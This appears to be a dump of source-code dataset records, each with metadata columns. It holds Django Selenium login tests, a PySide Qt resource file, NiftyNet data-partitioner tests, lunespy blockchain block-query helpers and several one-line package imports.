self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': gfs1}))
# Select preferences for both projects
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='Very Interested']".format(gfs[1]['p1'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='projForm{}']/option[text()='PLEASE NO']".format(gfs[1]['p2'].pk)).click()
# Select preferences for all attributes
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='4']".format(gfs[1]['a1'].pk)).click()
#self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='2']".format(gfs[1]['a2'].pk)).click()
self.selenium.find_element_by_xpath("//select[@id='attrForm{}']/option[text()='5 (Most preferred)']".format(gfs[1]['a3'].pk)).click()
# Select a few students
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Kristian']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Min']").click()
self.selenium.find_element_by_xpath("//select[@id='participantForm']/option[text()='Ben']").click()
# Submit
self.selenium.find_element_by_xpath("//button[@id='submitForm']").click()
# Check the Modal
# .text only grabs VISIBLE text
modal_title = self.selenium.find_element_by_xpath("//h5[@id='submitSuccessModalLabel']").text
self.assertFalse("Your response has been submitted!" in modal_title)
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.common.exceptions import NoSuchElementException
from dbtools.models import *
class LoginScreenTest(StaticLiveServerTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.selenium = WebDriver()
cls.selenium.implicitly_wait(1)
@classmethod
def tearDownClass(cls):
cls.selenium.quit()
super().tearDownClass()
def setUp(self):
User.objects.create_user("bjohn","bjohn@umbc.edu","eYnNtTBH")
self.gf = addGroupFormer("Ben Johnson", "bjohn@umbc.edu", "CMSC 447-01")
self.gf.addParticipant("John Beachy", "johnny@niu.edu")
def test_login(self):
self.selenium.get(self.live_server_url + reverse('response_screen:login', kwargs={'groupformer_id': self.gf.pk}))
# No alert on first look
with self.assertRaises(NoSuchElementException):
alert = self.selenium.find_element_by_id('bad-email')
email = self.selenium.find_element_by_id('email')
email.send_keys("nonsense@non.sense")
submit = self.selenium.find_element_by_id('login-submit')
submit.click()
# Once an incorrect email is entered, an alert is shown
alert = self.selenium.find_element_by_id('bad-email')
email = self.selenium.find_element_by_id('email')
email.send_keys("johnny@niu.edu")
submit = self.selenium.find_element_by_id('login-submit')
submit.click()
# Should be redirected to response screen
self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}"))
def test_redirect_login(self):
self.selenium.get(self.live_server_url + reverse('response_screen:response_screen', kwargs={'groupformer_id': self.gf.pk}))
# Should be redirected to login screen
self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}/login"))
email = self.selenium.find_element_by_id('email')
email.send_keys("johnny@niu.edu")
submit = self.selenium.find_element_by_id('login-submit')
submit.click()
# Should be redirected to response screen
self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}"))
def test_login_logout_sequence(self):
self.selenium.get(self.live_server_url + reverse('response_screen:login', kwargs={'groupformer_id': self.gf.pk}))
email = self.selenium.find_element_by_id('email')
email.send_keys("johnny@niu.edu")
submit = self.selenium.find_element_by_id('login-submit')
submit.click()
# Should be redirected to response screen
self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}"))
self.selenium.find_element_by_id('logout-link').click()
# Logging out redirects to login afterwards
self.assertTrue(self.selenium.current_url.endswith(f"/response_screen/{self.gf.pk}/login")) | 55.929553 | 181 | 0.662591 | 4,087 | 32,551 | 5.124786 | 0.086127 | 0.061876 | 0.067224 | 0.096634 | 0.850179 | 0.831463 | 0.810026 | 0.788207 | 0.76381 | 0.739651 | 0 | 0.012944 | 0.174035 | 32,551 | 582 | 182 | 55.929553 | 0.766086 | 0.222727 | 0 | 0.677019 | 0 | 0 | 0.241919 | 0.158277 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.086957 | false | 0 | 0.034161 | 0 | 0.139752 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
15180a7a8ed3a1cf8e52d5d5a93cf23ea911e700 | 35 | py | Python | vnpy/api/bitfinex/__init__.py | black0144/vnpy | 0d0ea30dad14a0150f7500ff9a62528030321426 | [
"MIT"
] | 5 | 2019-01-17T12:14:14.000Z | 2021-05-30T10:24:42.000Z | vnpy/api/bitfinex/__init__.py | black0144/vnpy | 0d0ea30dad14a0150f7500ff9a62528030321426 | [
"MIT"
] | 1 | 2018-06-12T10:08:24.000Z | 2018-06-12T10:08:24.000Z | vnpy/api/bitfinex/__init__.py | black0144/vnpy | 0d0ea30dad14a0150f7500ff9a62528030321426 | [
"MIT"
] | 5 | 2019-03-26T03:17:45.000Z | 2019-11-05T08:08:18.000Z | from .vnbitfinex import BitfinexApi | 35 | 35 | 0.885714 | 4 | 35 | 7.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 35 | 1 | 35 | 35 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
12ae7e1403bc5bc10c3543d6cd8c103cf792ff33 | 99 | py | Python | src/ml_commons/layers/__init__.py | pekalam/ml_commons | 739293e5eb5b9bce453f0a9ab77a61acba554807 | [
"MIT"
] | null | null | null | src/ml_commons/layers/__init__.py | pekalam/ml_commons | 739293e5eb5b9bce453f0a9ab77a61acba554807 | [
"MIT"
] | null | null | null | src/ml_commons/layers/__init__.py | pekalam/ml_commons | 739293e5eb5b9bce453f0a9ab77a61acba554807 | [
"MIT"
] | null | null | null | from .channelwise_dense.channelwise_dense import ChannelwiseDense
from .unpool.unpool import Unpool | 49.5 | 65 | 0.888889 | 12 | 99 | 7.166667 | 0.5 | 0.372093 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070707 | 99 | 2 | 66 | 49.5 | 0.934783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
12d050fdcf26385c40c09f073a54f28e2e873fbd | 30 | py | Python | mlcl/datasets/__init__.py | tmplxz/carelabels | 7e9b93ffa05d6f3e6a598ffb79cef3df7aecac68 | [
"MIT"
] | null | null | null | mlcl/datasets/__init__.py | tmplxz/carelabels | 7e9b93ffa05d6f3e6a598ffb79cef3df7aecac68 | [
"MIT"
] | null | null | null | mlcl/datasets/__init__.py | tmplxz/carelabels | 7e9b93ffa05d6f3e6a598ffb79cef3df7aecac68 | [
"MIT"
] | null | null | null | from .base import DatasetBase
| 15 | 29 | 0.833333 | 4 | 30 | 6.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 30 | 1 | 30 | 30 | 0.961538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
425014a7a1162c50ca5e409a209ba5e77460c18b | 3,118 | py | Python | Lib/site-packages/PySide/examples/widgets/tooltips/tooltips_rc.py | heylenz/python27 | bee49fa9d65b8ab7d591146a5b6cd47aeb41d940 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | Lib/site-packages/PySide/examples/widgets/tooltips/tooltips_rc.py | heylenz/python27 | bee49fa9d65b8ab7d591146a5b6cd47aeb41d940 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | Lib/site-packages/PySide/examples/widgets/tooltips/tooltips_rc.py | heylenz/python27 | bee49fa9d65b8ab7d591146a5b6cd47aeb41d940 | [
"bzip2-1.0.6",
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Resource object code
#
# Created: to syyskuuta 2 17:22:34 2010
# by: The Resource Compiler for PyQt (Qt v4.7.0)
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore
qt_resource_data = "\
\x00\x00\x00\xaa\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x00\x71\x49\x44\x41\x54\x58\xc3\xed\xce\x4b\x0a\x80\x30\
\x10\x04\xd1\x1c\xd3\x23\x7a\xcb\x11\x82\xb8\x50\x62\x92\xf9\xd5\
\x66\x1a\x7a\x5d\xaf\xb5\x5a\xcd\x36\xb9\xcf\xc4\x8f\x53\xfa\x09\
\xc4\x13\xa7\x10\x28\xe0\x13\xcf\x44\x0c\xe3\x59\x08\x14\x30\x8d\
\x47\x23\x50\xc0\x72\x3c\x02\xb1\x1d\xf7\x46\xa0\x00\x75\xdc\x03\
\x61\x8e\x5b\x11\x28\xc0\x2d\xae\x45\xa0\x00\xf7\xf8\x0e\x22\x2c\
\xbe\x8a\x40\x01\xe1\xf1\x3f\x44\x5a\x7c\x84\x40\x01\xe9\xf1\x37\
\x42\xe0\xd7\xd8\x5d\x0f\x6f\x97\x11\x88\x38\xa9\x1e\x00\x00\x00\
\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x00\x5e\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x01\x03\x00\x00\x00\x49\xb4\xe8\xb7\
\x00\x00\x00\x06\x50\x4c\x54\x45\x00\x00\x00\x58\xa8\xff\x8c\x14\
\x1f\xab\x00\x00\x00\x13\x49\x44\x41\x54\x08\xd7\x63\x60\x00\x81\
\xfa\xff\xff\xff\x0d\x3e\x02\x04\x00\x8d\x4d\x68\x6b\xcf\xb8\x8e\
\x86\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x00\xa5\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x00\x6c\x49\x44\x41\x54\x58\xc3\xed\xd7\x5b\x0e\x00\x10\
\x0c\x44\x51\xcb\xb4\x44\xbb\x64\x03\x1e\xd5\x18\x1d\x31\x12\xdf\
\xf7\x7c\xd1\xa6\xf4\xe8\xa9\x93\x8b\x8f\xe6\x52\x87\x17\x81\x59\
\x46\x0d\x18\x7f\xdc\x13\x1e\x40\x62\xe2\x5e\xc4\xd1\xf8\x2e\x02\
\x12\xb7\x22\xa0\x71\x0b\x22\x14\x70\x25\x3e\x43\xfc\x0d\xb8\x1a\
\xef\x21\x04\x10\x40\x00\x3d\x44\x14\x00\x7d\xc7\x14\x13\x11\xc5\
\x4c\x48\x31\x15\x53\xec\x05\x14\x9b\x11\xc5\x6e\x08\xdd\x8e\x1b\
\x14\x54\x19\xf3\xa1\x23\xdb\xd5\x00\x00\x00\x00\x49\x45\x4e\x44\
\xae\x42\x60\x82\
"
qt_resource_name = "\
\x00\x06\
\x07\x03\x7d\xc3\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x73\
\x00\x0c\
\x05\x59\xa7\xc7\
\x00\x74\
\x00\x72\x00\x69\x00\x61\x00\x6e\x00\x67\x00\x6c\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0a\
\x08\x8b\x06\x27\
\x00\x73\
\x00\x71\x00\x75\x00\x61\x00\x72\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0a\
\x0a\x2d\x16\x47\
\x00\x63\
\x00\x69\x00\x72\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct = "\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\
\x00\x00\x00\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x30\x00\x00\x00\x00\x00\x01\x00\x00\x00\xae\
\x00\x00\x00\x4a\x00\x00\x00\x00\x00\x01\x00\x00\x01\x10\
"
def qInitResources():
QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 37.566265 | 96 | 0.722258 | 687 | 3,118 | 3.25182 | 0.323144 | 0.241719 | 0.213518 | 0.091316 | 0.384064 | 0.378693 | 0.376007 | 0.346464 | 0.335721 | 0.27932 | 0 | 0.338824 | 0.045863 | 3,118 | 82 | 97 | 38.02439 | 0.412101 | 0.059333 | 0 | 0.149254 | 0 | 0.522388 | 0 | 0 | 0 | 1 | 0.002735 | 0 | 0 | 1 | 0.029851 | false | 0 | 0.014925 | 0 | 0.044776 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
426b88abfd9da8a3a2b8e49df396408319b2fba2 | 49 | py | Python | models/__init__.py | pratyaksh10/TPSNet | b0287e2db28d3e398aa344c86e5a4913f2ecb874 | [
"MIT"
] | 2 | 2022-03-25T03:30:54.000Z | 2022-03-25T03:31:04.000Z | models/__init__.py | pratyaksh10/TPSNet | b0287e2db28d3e398aa344c86e5a4913f2ecb874 | [
"MIT"
] | null | null | null | models/__init__.py | pratyaksh10/TPSNet | b0287e2db28d3e398aa344c86e5a4913f2ecb874 | [
"MIT"
] | 6 | 2022-03-25T03:31:29.000Z | 2022-03-25T22:29:59.000Z | from .basic_block import *
from .resnet import * | 24.5 | 27 | 0.755102 | 7 | 49 | 5.142857 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163265 | 49 | 2 | 28 | 24.5 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
35e92c7b98db380e4b808f48ec7b5741b418b31a | 11,357 | py | Python | tests/driver_partitioner_test.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 2 | 2019-03-25T18:50:47.000Z | 2019-10-10T01:45:02.000Z | tests/driver_partitioner_test.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | null | null | null | tests/driver_partitioner_test.py | elias-1/NiftyNet | 05cd2ffbff5043d9a40b524a6d72f6bd5cd072d2 | [
"Apache-2.0"
] | 2 | 2018-05-13T14:54:48.000Z | 2018-05-26T16:08:09.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function
import os
import tensorflow as tf
from niftynet.engine.application_driver import ApplicationDriver
from niftynet.utilities.util_common import ParserNamespace
TARGET_FILE = os.path.join('testing_data', 'test_splitting.csv')
def _generate_base_params():
# initialise compulsory params that are irrelevant
# to this unit test
user_param = dict()
user_param['SYSTEM'] = ParserNamespace(
model_dir='./testing_data',
num_threads=2,
num_gpus=1,
cuda_devices='')
user_param['NETWORK'] = ParserNamespace(
batch_size=20,
name='tests.toy_application.TinyNet')
user_param['TRAINING'] = ParserNamespace(
starting_iter=0,
max_iter=2,
save_every_n=2,
tensorboard_every_n=0,
max_checkpoints=100)
user_param['INFERENCE'] = ParserNamespace(
inference_iter=-1)
user_param['CUSTOM'] = ParserNamespace(
name='tests.toy_application.ToyApplication',
vector_size=100,
mean=10.0,
stddev=2.0)
return user_param
def _generate_data_param():
user_param = dict()
user_param['modality'] = ParserNamespace(
csv_file=os.path.join('testing_data', 'mod1test.csv'),
path_to_search='testing_data')
user_param['modality2'] = ParserNamespace(
csv_file=os.path.join('testing_data', 'mod2test.csv'),
path_to_search='testing_data')
return user_param
def generate_input_params(**arg_dicts):
user_param = _generate_base_params()
for key in list(arg_dicts):
if not arg_dicts[key]:
continue
user_param[key].update(**arg_dicts[key])
return user_param
def clear_target():
if not os.path.isfile(TARGET_FILE):
return
os.remove(TARGET_FILE)
def write_target():
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 2,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
assert os.path.isfile(TARGET_FILE)
return
class DriverPartitionerTestExistingFile(tf.test.TestCase):
def test_training(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 2,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_training_no_validation(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_inference_no_validation(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_inference_validation(self):
write_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 10,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
class DriverPartitionerTestNoFile(tf.test.TestCase):
def test_training(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 2,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_training_no_validation(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.has_training)
self.assertFalse(partitioner.has_inference)
self.assertFalse(partitioner.has_validation)
self.assertTrue(partitioner.all_files is not None)
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.has_training)
self.assertFalse(partitioner.has_inference)
self.assertFalse(partitioner.has_validation)
self.assertTrue(partitioner.all_files is not None)
def test_inference(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner._partition_ids is None)
def test_inference_no_validation(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner._partition_ids is None)
class DriverPartitionerTestNoData(tf.test.TestCase):
def test_no_data_param_infer(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
}
)
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, {})
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.all_files)
def test_no_data_param_train(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, {})
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.all_files)
if __name__ == "__main__":
tf.test.main()
| 36.400641 | 65 | 0.6168 | 1,142 | 11,357 | 5.728546 | 0.114711 | 0.053653 | 0.055029 | 0.043565 | 0.837053 | 0.814736 | 0.79196 | 0.783094 | 0.769948 | 0.769948 | 0 | 0.010526 | 0.29735 | 11,357 | 311 | 66 | 36.517685 | 0.809273 | 0.007749 | 0 | 0.669145 | 0 | 0 | 0.139459 | 0.05992 | 0 | 0 | 0 | 0 | 0.133829 | 1 | 0.055762 | false | 0 | 0.018587 | 0 | 0.104089 | 0.003717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c4034ee4ced44113f76cd926f78e968fcaf695be | 135 | py | Python | bioscrape/__init__.py | zoltuz/bioscrape | bf0f1d4b6f68f265fc208733b75ec16c36a28688 | [
"MIT"
] | 16 | 2017-11-16T02:22:25.000Z | 2020-06-15T20:36:44.000Z | bioscrape/__init__.py | zoltuz/bioscrape | bf0f1d4b6f68f265fc208733b75ec16c36a28688 | [
"MIT"
] | 90 | 2020-04-16T23:39:29.000Z | 2021-09-18T18:37:06.000Z | bioscrape/__init__.py | zoltuz/bioscrape | bf0f1d4b6f68f265fc208733b75ec16c36a28688 | [
"MIT"
] | 15 | 2018-04-18T03:09:07.000Z | 2020-06-26T18:02:23.000Z | import bioscrape.random
import bioscrape.types
import bioscrape.simulator
import bioscrape.inference
bioscrape.random.py_seed_random() | 22.5 | 33 | 0.874074 | 17 | 135 | 6.823529 | 0.470588 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 135 | 6 | 33 | 22.5 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c40c37623240d157b1b69b626ae2928afccb8c41 | 2,455 | py | Python | lunespy/server/blocks/__init__.py | lunes-platform/LunesPy | ae50786debb84114582b5fc67ac28ac2ea66b8c5 | [
"Apache-2.0"
] | 4 | 2022-01-06T20:59:36.000Z | 2022-01-07T11:27:19.000Z | lunespy/server/blocks/__init__.py | lunes-platform/LunesPy | ae50786debb84114582b5fc67ac28ac2ea66b8c5 | [
"Apache-2.0"
] | null | null | null | lunespy/server/blocks/__init__.py | lunes-platform/LunesPy | ae50786debb84114582b5fc67ac28ac2ea66b8c5 | [
"Apache-2.0"
] | 1 | 2022-02-11T13:37:03.000Z | 2022-02-11T13:37:03.000Z | from requests import get
from lunespy.server.nodes import Node
def block_from_height(height: int, node_url: str = None) -> dict:
if node_url == None:
full_url = f'{Node.mainnet.value}/blocks/at/{height}'
else:
full_url = f'{node_url}/blocks/at/{height}' # You have pass your node url with https or other contents
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
def range_block(start_block: int, end_block: int, node_url: str = None) -> dict:
if node_url == None:
full_url = f'{Node.mainnet.value}/blocks/seq/{start_block}/{end_block}'
else:
full_url = f'{node_url}/blocks/seq/{start_block}/{end_block}' # You have pass your node url with https or other contents
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
def last_block(node_url: str = None) -> dict:
if node_url == None:
full_url = f'{Node.mainnet.value}/blocks/last'
else:
full_url = f'{node_url}/blocks/last' # You have pass your node url with https or other contents
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
def blocks_generated_by_specified_address(address: str, start_block: int, end_block: int, node_url: str = None) -> dict:
if node_url == None:
full_url = f'{Node.mainnet.value}/blocks/address/{address}/{start_block}/{end_block}'
else:
full_url = f'{node_url}/blocks/address/{address}/{start_block}/{end_block}' # You have pass your node url with https or other contents
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
| 29.578313 | 142 | 0.573931 | 306 | 2,455 | 4.447712 | 0.173203 | 0.082292 | 0.047024 | 0.070536 | 0.880235 | 0.880235 | 0.875827 | 0.818516 | 0.818516 | 0.818516 | 0 | 0.014027 | 0.303055 | 2,455 | 82 | 143 | 29.939024 | 0.781414 | 0.092464 | 0 | 0.666667 | 0 | 0 | 0.224022 | 0.161044 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.030303 | 0 | 0.212121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
